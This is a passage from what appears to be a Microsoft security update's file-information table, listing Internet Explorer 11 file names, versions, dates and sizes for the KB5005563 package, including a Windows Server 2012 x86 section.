11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 18:59| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 20:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:22| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 4:46| 427,520 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 17:52| 292,864 \ninstall.ins| Not versioned| 13-Aug-2021| 17:53| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:02| 548,864 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 107,008 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 19:34| 23,552 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:02| 62,464 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.17416| 30-Oct-2014| 19:52| 495,616 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 21:19| 726,016 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 39,936 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 364,032 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 17:58| 221,696 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:50| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:20| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:17| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20045| 4-Jun-2021| 21:17| 175,616 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 17:44| 10,948,608 \nF12Tools.dll| 11.0.9600.20045| 4-Jun-2021| 21:16| 263,680 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:08| 1,186,304 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 587,776 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:51| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:43| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:34| 43,520 \nmsfeedssync.exe| 11.0.9600.16384| 21-Aug-2013| 20:05| 11,776 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 73,216 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 19:15| 16,228,864 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 1:36| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:39| 3,228 \nIEAdvpack.dll| 11.0.9600.16384| 21-Aug-2013| 19:54| 98,816 \nieetwcollector.exe| 11.0.9600.18658| 5-Apr-2017| 10:29| 98,816 \nieetwproxystub.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 43,008 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 1:36| 4,096 \nielowutil.exe| 11.0.9600.17031| 22-Feb-2014| 1:32| 222,208 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 308,224 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:11| 268,800 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 34,816 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.16518| 6-Feb-2014| 1:12| 112,128 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 20:15| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 457,216 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 574,976 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 1,935,360 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:22| 60,928 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,105,408 \noccache.dll| 11.0.9600.19867| 12-Oct-2020| 21:01| 121,856 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \nwebcheck.dll| 11.0.9600.19867| 12-Oct-2020| 20:57| 201,216 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \npdm.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 420,752 \nmsdbg2.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 295,320 \npdmproxy100.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 76,712 \nmsrating.dll| 11.0.9600.17905| 15-Jun-2015| 12:46| 157,184 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 20:45| 2,186,240 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 17:52| 678,400 \niernonce.dll| 11.0.9600.16518| 6-Feb-2014| 1:15| 28,160 \niesetup.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 59,904 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:46| 16,303 \ninseng.dll| 11.0.9600.16384| 21-Aug-2013| 19:35| 77,312 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:28| 87,552 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:02| 155,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 130,048 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:09| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 734,720 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 19:49| 236,032 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:03| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:48| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:50| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:10| 12,315,136 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:38| 24,486 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 18:45| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:24| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:17| 675,328 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 20:15| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:13| 3,571,712 \njscript9diag.dll| 11.0.9600.20045| 4-Jun-2021| 21:23| 557,568 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:31| 516,096 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:37| 403,968 \n \n### **Windows Server 2012**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nFileinfo.xml| Not Applicable| 20-Aug-21| 0:38| 590,629 \nIe11-windows6.2-kb5005563-x86-express.cab| Not Applicable| 19-Aug-21| 23:14| 726,202 \nIe11-windows6.2-kb5005563-x86.msu| Not Applicable| 19-Aug-21| 22:46| 27,627,035 \nIe11-windows6.2-kb5005563-x86.psf| Not Applicable| 19-Aug-21| 22:59| 184,419,043 \nPackageinfo.xml| Not Applicable| 20-Aug-21| 0:38| 1,133 \nPackagestructure.xml| Not Applicable| 20-Aug-21| 0:38| 149,422 \nPrebvtpackageinfo.xml| Not Applicable| 20-Aug-21| 0:38| 573 \nIe11-windows6.2-kb5005563-x86.cab| Not Applicable| 19-Aug-21| 22:35| 27,497,280 \nIe11-windows6.2-kb5005563-x86.xml| Not Applicable| 19-Aug-21| 22:39| 450 \nWsusscan.cab| Not Applicable| 19-Aug-21| 22:42| 173,732 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:19| 1,342,976 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 18:56| 810,384 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:35| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 288,256 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 285,184 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 297,472 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 288,768 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 286,208 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 281,600 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 286,720 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 292,352 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 242,176 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 243,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,080 \nUrlmon.dll.mui| 11.0.9600.20112| 